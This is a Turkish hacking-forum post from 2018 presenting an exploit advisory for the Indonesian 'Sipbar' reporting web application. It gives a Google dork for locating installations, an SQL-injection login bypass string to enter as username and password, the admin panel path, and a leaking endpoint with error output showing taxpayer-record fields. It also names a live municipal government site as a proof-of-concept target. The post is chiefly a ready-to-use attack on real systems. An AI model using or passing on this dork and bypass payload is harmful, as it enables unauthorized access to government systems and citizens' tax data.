Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Sipbar Sistem Informasi Pelaporan Vulnerability
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Sipbar Sistem Informasi Pelaporan Vulnerability
21.06.2018 04:02
################################################################################​#################

# Exploit Title : Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dorks : inurl:''/assets/media/logo_kanal/''

# Exploit : Use both for username and password as => '=''or'

# Admin Control Panel Path : /login

# Site Logo Change Path => /assets/media/logo_kanal/.....

################################################################################​#################

# SQL Injection Error =>

# /penyebaran/tracking_sppt/getNop/

A PHP Error was encountered
Severity: Warning

Message: Missing argument 1 for Tracking_sppt::getNop()

Filename: controllers/tracking_sppt.php

Line Number: 19

{"id_sppt":"1077420","thn_pajak":"0","nop":"","nop2":"","kd_kecamatan":null,"kd_kelurahan":null,"nama_wp":null,"kecamatan":null,
"kelurahan":null,"alamat_op":null,"alamat_wp":null,"pbb":null}

################################################################################​#################

# Example Sites : sipbar.tangerangkota.go.id => [ Proof of Concept ] => archive.is/aHKRV - archive.is/1K0DF

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi